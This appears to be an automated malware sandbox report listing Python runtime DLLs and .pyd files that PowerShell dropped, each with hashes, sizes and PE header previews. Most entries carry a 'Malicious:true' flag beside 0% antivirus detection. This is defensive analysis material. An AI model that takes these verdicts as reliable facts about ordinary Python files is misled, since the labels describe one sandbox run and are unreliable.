                              SHA-256:003F06B975E311A9725DBD53B199D42DFF25DF7F8B3AB93BB1AF56C321865FE0
                              SHA-512:133DFBB4936CAAA3DA63EC515CE7431DBD3AAF81C405E86EE4FFDA23B6526287F71E5DB8914152110E1F8557B408497013905BE0B200BAA7CEA3F1E5359D623A
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............s.M.s.M.s.M..|M.s.M...L.s.M...L.s.M...L.s.M...L.s.M...L.s.M...L.s.M.s.M.s.M...L.s.M...L.s.M...M.s.M...L.s.MRich.s.M........PE..d...}K.f.........." ...&.....T.......2..............................................d.....`.........................................@b..H....b.........................../...........W..T............................V..@............@...............................text....-.......................... ..`.rdata.......@...0...2..............@..@.data... ....p.......b..............@....pdata...............n..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):35096
                              Entropy (8bit):6.457363388284004
                              Encrypted:false
                              SSDEEP:
                              MD5:A4281E383EF82C482C8BDA50504BE04A
                              SHA1:4945A2998F9C9F8CE1C078395FFBEDB29C715D5D
                              SHA-256:467B0FEF42D70B55ABF41D817DFF7631FAEEF84DCE64F8AADB5690A22808D40C
                              SHA-512:661E38B74F8BFDD14E48E65EE060DA8ECDF67C0E3CA1B41B6B835339AB8259F55949C1F8685102FD950BF5DE11A1B7C263DA8A3A4B411F1F316376B8AA4A5683
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......de.* ..y ..y ..y)|Fy"..y&..x"..y&..x-..y&..x(..y&..x#..yO..x"..y ..yB..yk|.x%..yO..x"..yO..x!..yO.*y!..yO..x!..yRich ..y........................PE..d...}K.f.........." ...&.....>......L...............................................=.....`.........................................0E..`....E..x............p.......Z.../...........4..T............................3..@............0...............................text............................... ..`.rdata..r ...0..."..."..............@..@.data...X....`.......D..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):55576
                              Entropy (8bit):6.346382537794332
                              Encrypted:false
                              SSDEEP:
                              MD5:BA368245D104B1E016D45E96A54DD9CE
                              SHA1:B79EF0EB9557A0C7FA78B11997DE0BB057AB0C52
                              SHA-256:67E6CA6F1645C6928ADE6718DB28AFF1C49A192E8811732B5E99364991102615
                              SHA-512:429D7A1F829BE98C28E3DCA5991EDCADFF17E91F050D50B608A52EF39F6F1C6B36AB71BFA8E3884167371A4E40348A8CDA1A9492B125FB19D1A97C0CCB8F2C7B
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.{.2.(.2.(.2.(.J.(.2.(...).2.(...).2.(...).2.(...).2.(..).2.(.2.(.2.(.J.).2.(.J.).2.(..).2.(..).2.(.g(.2.(..).2.(Rich.2.(........PE..d...}K.f.........." ...&.L...`............................................................`.............................................X.............................../......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata...8...`...:...P..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):32536
                              Entropy (8bit):6.462349221807228
                              Encrypted:false
                              SSDEEP:
                              MD5:6E0CB85DC94E351474D7625F63E49B22
                              SHA1:66737402F76862EB2278E822B94E0D12DCB063C5
                              SHA-256:3F57F29ABD86D4DC8F4CA6C3F190EBB57D429143D98F0636FF5117E08ED81F9B
                              SHA-512:1984B2FC7F9BBDF5BA66716FC60DCFD237F38E2680F2FC61F141FF7E865C0DBDD7CDC47B3BC490B426C6CFE9F3F9E340963ABF428EA79EB794B0BE7D13001F6A
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\.~...~...~.......~.......~.......~.......~.......~.......~.......~...~...~.......~.......~....}..~.......~..Rich.~..................PE..d....K.f.........." ...&.....8......................................................\]....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):83224
                              Entropy (8bit):6.336512797446254
                              Encrypted:false
                              SSDEEP:
                              MD5:DC06F8D5508BE059EAE9E29D5BA7E9EC
                              SHA1:D666C88979075D3B0C6FD3BE7C595E83E0CB4E82
                              SHA-256:7DAFF6AA3851A913ED97995702A5DFB8A27CB7CF00FB496597BE777228D7564A
                              SHA-512:57EB36BC1E9BE20C85C34B0A535B2349CB13405D60E752016E23603C4648939F1150E4DBEBC01EC7B43EB1A6947C182CCB8A806E7E72167AD2E9D98D1FD94AB3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.i....}...}...}..}...}.0.|...}.0.|...}.0.|...}.0.|...}o0.|...}...}...}K..|...}o0.|...}o0.|...}o0.}...}o0.|...}Rich...}........PE..d....K.f.........." ...&.v...........-.......................................`............`.............................................P............@.......0.........../...P..........T...............................@............................................text....u.......v.................. ..`.rdata...x.......z...z..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):124696
                              Entropy (8bit):6.265772425588066
                              Encrypted:false
                              SSDEEP:
                              MD5:29464D52BA96BB11DBDCCBB7D1E067B4
                              SHA1:D6A288E68F54FB3F3B38769F271BF885FD30CBF6
                              SHA-256:3E96CD9E8ABBEA5C6B11EE91301D147F3E416AC6C22EB53123EAEAE51592D2FE
                              SHA-512:3191980CDF4AB34E0D53BA18E609804C312348DA5B79B7242366B9E3BE7299564BC1EC08F549598041D434C9C5D27684349EFF0EAA45F8FA66A02DD02F97862B
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~..~..~...P..~.....~...>..~.....~.....~......~.....~.....~..~........~.....~...<..~......~.Rich.~.........PE..d....K.f.........." ...&............|...............................................Ze....`..........................................o..P....p..................h......../.......... ...T...............................@............................................text............................... ..`.rdata.............................@..@.data...x............|..............@....pdata..h...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):178456
                              Entropy (8bit):5.9718801387586655
                              Encrypted:false
                              SSDEEP:
                              MD5:5B9B3F978D07E5A9D701F832463FC29D
                              SHA1:0FCD7342772AD0797C9CB891BF17E6A10C2B155B
                              SHA-256:D568B3C99BF0FC35A1F3C5F66B4A9D3B67E23A1D3CF0A4D30499D924D805F5AA
                              SHA-512:E4DB56C8E0E9BA0DB7004463BF30364A4E4AB0B545FB09F40D2DBA67B79B6B1C1DB07DF1F017501E074ABD454D1E37A4167F29E7BBB0D4F8958FA0A2E9F4E405
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&h^.G...G...G...?...G.......G.......G.......G.......G.......G.......G...G..eF...?...G.......G.......G.......G.......G..Rich.G..................PE..d....K.f.........." ...&............X,..............................................c:....`.............................................d...D...................P......../......x.......T...........................@...@............................................text...$........................... ..`.rdata...#.......$..................@..@.data...h...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):55576
                              Entropy (8bit):6.40171266160814
                              Encrypted:false
                              SSDEEP:
                              MD5:097BC768988E1CCFB8080EEB782E9F14
                              SHA1:F1C192CEDE46AB1EBB371DCD44327B20572AF011
                              SHA-256:1AFBDA83FF0B55AC734BA1B865D67F27217F573A95317FA15244300CA5DF1479
                              SHA-512:082B5762B14EF74414623044A36629F78AB8AACCFF64E376C8A9C3EE45609C0DE2561184DAB71EDC4C31058B4504313442C6400E20292700A0A33AD8E3E51CD0
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.~z..~z..~z......~z...{..~z......~z...~..~z...y..~z...{..~z...{..~z..~{..~z...r..~z...z..~z......~z...x..~z.Rich.~z.........................PE..d...fK.f.........." ...&.Z...`.......^...............................................]....`.........................................P...X.......d...............t......../..............T...............................@............p...............................text...XY.......Z.................. ..`.rdata...-...p.......^..............@..@.data...............................@....pdata..t...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_testcapi.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):286488
                              Entropy (8bit):5.931006412242329
                              Encrypted:false
                              SSDEEP:
                              MD5:5B7D59037D818C7DE124886DEA4A6582
                              SHA1:42364599CD533F8E206CFCC79869068576A27C1D
                              SHA-256:F222B4BBB62E814E632ED08239AFF96809B306AD94C724C0FD7AB47BF320FC1E
                              SHA-512:DEADCEA1232AC752AB203454932F6787C3EE7FAB247B0F7A7E8657789C3C0192B5484EF77F84F591AB28D51A1B84EDF67D883A78F15A83C6D17D242C3E6A7D50
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aw..............x...........................................x.............................................Rich............................PE..d...kK.f.........." ...&.0...........2.......................................`......6x....`..........................................1..T...$2.......@..........$$...0.../...P..p...@...T...............................@............@..p............................text...(........0.................. ..`.rdata...7...@...8...4..............@..@.data...P............l..............@....pdata..$$.......&..................@..@.rsrc........@......................@..@.reloc..p....P......."..............@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_testclinic.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):65816
                              Entropy (8bit):6.225635148398098
                              Encrypted:false
                              SSDEEP:
                              MD5:1F08F97422A906170A803F40FE7DA3EE
                              SHA1:F80031D66F32DB04E9698201C796521145BB1241
                              SHA-256:64AE141A640C2A39C11C28AAFE0A2432F26D0F56B8177F1F070B3DA3797F11D9
                              SHA-512:E7E48E2B112F4B440C28D750EB4430BA6C5F456E4732767953EA1384A16BCE35B1BC58D7A15A789CDDD02F46DD989E4AA4F8D32BB7E3BC49F2E453987CC54017
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............._.._.._.._.._._.^.._._.^.._._.^.._._.^.._._.^.._...^.._.._.._._.^.._._.^.._._v_.._._.^.._Rich.._........................PE..d...pK.f.........." ...&.j...j.......m..............................................I8....`.............................................X...h...d...............0......../..........p...T...........................0...@............................................text...8h.......j.................. ..`.rdata...:.......<...n..............@..@.data...............................@....pdata..0...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_testconsole.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):27416
                              Entropy (8bit):6.475370635016973
                              Encrypted:false
                              SSDEEP:
                              MD5:598C1E1574A03BBB6781F68A9E741AB9
                              SHA1:5A51E31C58729CC3648B620E488CF08BA3FAD0FE
                              SHA-256:3562BE23F901115E00486DC09B467E7E6AE31D7DB0A3C9AE17019F76B92F8246
                              SHA-512:2C95F71BB9D6ED5A6287EFD1EFE8F921E82FD87F7DFC685E4EB6EB23B909D2228F25862E1B77EE127E210EB5397AFE506389F9B6BABEA6CF4A11021B5E2D0404
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bK..&*p.&*p.&*p./R..$*p. .q.$*p. .u.-*p. .t..*p. .s.%*p.I.q.$*p.mRq.%*p.&*q..*p.I.x.'*p.I.p.'*p.I...'*p.I.r.'*p.Rich&*p.........PE..d...oK.f.........." ...&.....,......,...............................................%.....`..........................................;..X....;..d....p.......`..4....<.../......X....5..T............................3..@............0..p............................text............................... ..`.rdata.......0......................@..@.data........P.......(..............@....pdata..4....`.......,..............@..@.rsrc........p.......0..............@..@.reloc..X............:..............@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_testimportmultiple.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):25368
                              Entropy (8bit):6.574599443384358
                              Encrypted:false
                              SSDEEP:
                              MD5:C3ECAF0172508E20330D9754A046AB90
                              SHA1:383D7AE27F97D34F333B1D8053AEC3C30C7418E5
                              SHA-256:D6C24D7D5C1D0885DE58116A5578D4AF6114CD821D1189EF82078A56315E5C8F
                              SHA-512:E20275E59FB1C4E3B2DB8F8B80CAE9F2D41D2BC807580D10AF5B442D46105345A6C0F0F05A6C490F447E58937055698ED251FE752885AA02F0E17016BE135BA4
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.N..N..N..6..N....N....N....N....N.....N...6..N..N..N.....N.....N......N.....N..Rich.N..........PE..d...mK.f.........." ...&.....&...............................................p............`.........................................@).......)..d....P.......@.......4.../...`..@....#..T...........................P"..@............ ...............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_testinternalcapi.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):49944
                              Entropy (8bit):6.2948997449735815
                              Encrypted:false
                              SSDEEP:
                              MD5:061E1A66E8126B876D74382647050E98
                              SHA1:5C87523567F9457D4FBFADEB7E9EAE88976BA589
                              SHA-256:A9BDCA1F485B71F1B73EE92A370B9E21D9D01A2ED4D22C5A7A9D2BD43D8843F0
                              SHA-512:77FA41723F485B01D9CDD9BFA0942A3171697D396B5B271503F218E1D694D4CD711E5A2DCB056FD62CCD1FE146495CF97703C92D4D9A2177EEF4AD4EAAC713F9
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.~z..~z..~z......~z...{..~z......~z...~..~z...y..~z...{..~z...{..~z..~{.;~z...r..~z...z..~z......~z...x..~z.Rich.~z.........................PE..d...lK.f.........." ...&.D...R......lG...............................................s....`.........................................P...d.......d......................../.......... y..T............................w..@............`...............................text....B.......D.................. ..`.rdata...2...`...4...H..............@..@.data................|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_testmultiphase.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):38680
                              Entropy (8bit):6.199368645201516
                              Encrypted:false
                              SSDEEP:
                              MD5:0003A36A8A351D5657EF50C246050E2E
                              SHA1:C9AD244BCACC2543A6AF4AE2D42C317E94BE01FD
                              SHA-256:E4FEAB86E5372F5229E2D63E6BF4F8680A8CFE2838FEDADB12532771D22F76EC
                              SHA-512:6A67A2D6413EFB0F2AD2EF3848CEF89AE135692385828029DC60FD04982AE7380C1AC64FE3CA7F2E5B954F1A2ED021AC2240C853B2E69B327ADBC210A4E097D8
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.H.Np..Np..Np..6...Np...q..Np...u..Np...t..Np...s..Np...q..Np..6q..Np..Nq..Np...x..Np...p..Np.....Np...r..Np.Rich.Np.................PE..d...nK.f.........." ...&.....P......<.....................................................`.........................................PI.......N..d....................h.../......P....B..T...........................@A..@............0..P............................text............................... ..`.rdata...'...0...(..................@..@.data........`.......F..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..P............f..............@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_testsinglephase.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):29976
                              Entropy (8bit):6.455265929163021
                              Encrypted:false
                              SSDEEP:
                              MD5:03AD88C5004E88DF8FDDAD701CDC8FBE
                              SHA1:FF6BAB467D4C049A07FD16D133DE3F5B3F1FEC62
                              SHA-256:0F57A746F74C0DF12D30239481C210D28AEB1E85ADE96CEC6B797501157E0998
                              SHA-512:38C2E15D24ACA5D0078FD63A6F920963287BF1FEF41B7EB7CC3A8DC7236340B62ACE0FC990E30A8D8CD4970E6177D222353ADD164EB9F187A24615055D84D2AC
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.~x..~x..~x......~x...y..~x...}..~x...|..~x...{..~x...y..~x...y..~x..~y..~x...p..~x...x..~x......~x...z..~x.Rich.~x.................PE..d...nK.f.........." ...&.....2............................................................`..........................................=.......>..d....p.......`..@....F.../..........07..T............................5..@............0..h............................text............................... ..`.rdata..p....0......................@..@.data...8....P.......0..............@....pdata..@....`.......6..............@..@.rsrc........p.......:..............@..@.reloc...............D..............@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_tkinter.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):64280
                              Entropy (8bit):6.281608660509971
                              Encrypted:false
                              SSDEEP:
                              MD5:1DF0201667B4718637318DBCDC74A574
                              SHA1:FD44A9B3C525BEFFBCA62C6ABE4BA581B9233DB2
                              SHA-256:70439EE9A05583D1C4575DCE3343B2A1884700D9E0264C3ADA9701829483A076
                              SHA-512:530431E880F2BC193FAE53B6C051BC5F62BE08D8CA9294F47F18BB3390DCC0914E8E53D953EEE2FCF8E1EFBE17D98EB60B3583BCCC7E3DA5E21CA4DC45ADFAF4
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............og..og..og......og...f..og...b..og...c..og...d..og...f..og...f..og.G.f..og..of..og...j..og...g..og....og...e..og.Rich.og.................PE..d....K.f.........." ...&.h...f......................................................<_....`.............................................P................................/......$.......T...............................@...............p............................text....f.......h.................. ..`.rdata...@.......B...l..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_uuid.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):25368
                              Entropy (8bit):6.6236814553037
                              Encrypted:false
                              SSDEEP:
                              MD5:353E11301EA38261E6B1CB261A81E0FE
                              SHA1:607C5EBE67E29EABC61978FB52E4EC23B9A3348E
                              SHA-256:D132F754471BD8A6F6D7816453C2E542F250A4D8089B657392FE61A500AE7899
                              SHA-512:FA990B3E9619D59AE3AD0AEFFCA7A3513AB143BFD0AC9277E711519010F7C453258A4B041BE86A275F3C365E980FC857C23563F3B393D1E3A223973A673E88C5
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..p2..#2..#2..#;..#0..#4 ."0..#4 .">..#4 .":..#4 ."1..#] ."0..#y."7..#2..#...#] ."3..#] ."3..#] d#3..#] ."3..#Rich2..#................PE..d....K.f.........." ...&.....&...............................................p............`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...H........................... ..`.rdata....... ......................@..@.data...X....0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_wmi.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):36632
                              Entropy (8bit):6.3757770375418374
                              Encrypted:false
                              SSDEEP:
                              MD5:7EC3FC12C75268972078B1C50C133E9B
                              SHA1:73F9CF237FE773178A997AD8EC6CD3AC0757C71E
                              SHA-256:1A105311A5ED88A31472B141B4B6DAA388A1CD359FE705D9A7A4ABA793C5749F
                              SHA-512:441F18E8CE07498BC65575E1AE86C1636E1CEB126AF937E2547710131376BE7B4CB0792403409A81B5C6D897B239F26EC9F36388069E324249778A052746795E
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]lr.<.!.<.!.<.!.D.!.<.!... .<.!... .<.!... .<.!.. .<.!... .<.!.D. .<.!.<.!.<.!.D. .<.!.. .<.!.. .<.!..!.<.!.. .<.!Rich.<.!........................PE..d....K.f.........." ...&.(...:.......&.............................................._.....`..........................................U..H....V...............p..`....`.../......t...TG..T............................C..@............@.......S..@....................text....&.......(.................. ..`.rdata.......@... ...,..............@..@.data........`.......L..............@....pdata..`....p.......P..............@..@.rsrc................T..............@..@.reloc..t............^..............@..B........................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_zoneinfo.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):47896
                              Entropy (8bit):6.521879412925506
                              Encrypted:false
                              SSDEEP:
                              MD5:60432D8A7EB836CC7919789CDF77EC98
                              SHA1:B8465817E28F53CB1706F49D86A86D91376CAD10
                              SHA-256:EDB5FEC1B18C7B657DB1A20666896B51FC2D779AE315427ED920BA493038D327
                              SHA-512:7D3901B9878C93B881DC925FBCD88CE7308356C38E657F3B47E10E046B4473D16C03DBA8B7EF7F93C2B9C12C044609A073B4BDFA93257972E10A1DE216DC305F
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.4...Z...Z...Z.......Z..n[...Z..n_...Z..n^...Z..nY...Z.qn[...Z.U.[...Z...[.~.Z.qnR...Z.qnZ...Z.qn....Z.qnX...Z.Rich..Z.........PE..d...yK.f.........." ...&.J...F.......N....................................................`..........................................z..T...dz..x...............d......../...........n..T...........................Pm..@............`...............................text....H.......J.................. ..`.rdata...%...`...&...N..............@..@.data... ............t..............@....pdata..d............z..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\libcrypto-3.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):5191960
                              Entropy (8bit):5.962142634441191
                              Encrypted:false
                              SSDEEP:
                              MD5:E547CF6D296A88F5B1C352C116DF7C0C
                              SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                              SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                              SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\libffi-8.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):39696
                              Entropy (8bit):6.641880464695502
                              Encrypted:false
                              SSDEEP:
                              MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                              SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                              SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                              SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\libssl-3.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):787224
                              Entropy (8bit):5.609561366841894
                              Encrypted:false
                              SSDEEP:
                              MD5:19A2ABA25456181D5FB572D88AC0E73E
                              SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                              SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                              SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                              Malicious:true
